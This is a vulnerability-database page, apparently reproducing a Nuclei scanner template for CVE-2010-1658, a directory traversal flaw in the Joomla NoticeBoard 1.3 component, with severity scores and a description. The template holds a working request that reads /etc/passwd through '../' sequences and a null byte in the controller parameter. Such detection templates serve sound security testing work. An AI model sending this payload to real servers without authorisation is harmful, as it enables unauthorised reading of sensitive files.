Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1658
HistorySep 27, 2021 - 11:02 a.m.

Joomla! Component NoticeBoard 1.3 - Local File Inclusion

2021-09-2711:02:48
ProjectDiscovery
github.com
3

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.1 High

AI Score

Confidence

High

0.018 Low

EPSS

Percentile

88.0%

A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1658

info:
  name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can allow an attacker to read arbitrary files on the server, potentially leading to unauthorized access, sensitive information disclosure, or further attacks.
  remediation: |
    Update to the latest version of Joomla! Component NoticeBoard or apply the necessary patches to fix the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12427
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1658
    - http://www.vupen.com/english/advisories/2010/1007
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58176
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1658
    cwe-id: CWE-22
    epss-score: 0.01751
    epss-percentile: 0.87665
    cpe: cpe:2.3:a:code-garage:com_noticeboard:1.3:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: code-garage
    product: com_noticeboard
  tags: cve,cve2010,joomla,lfi,edb,code-garage

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d8786ea9146eb623bc2e6b94ff1ddfd987d8af333475bb9273ff1e2bd35ff26a02200fb7110b7f5395f71dee1c009e3dc058d633f521052cc4f3484c6f358684bbf8:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.1 High

AI Score

Confidence

High

0.018 Low

EPSS

Percentile

88.0%

Related for NUCLEI:CVE-2010-1658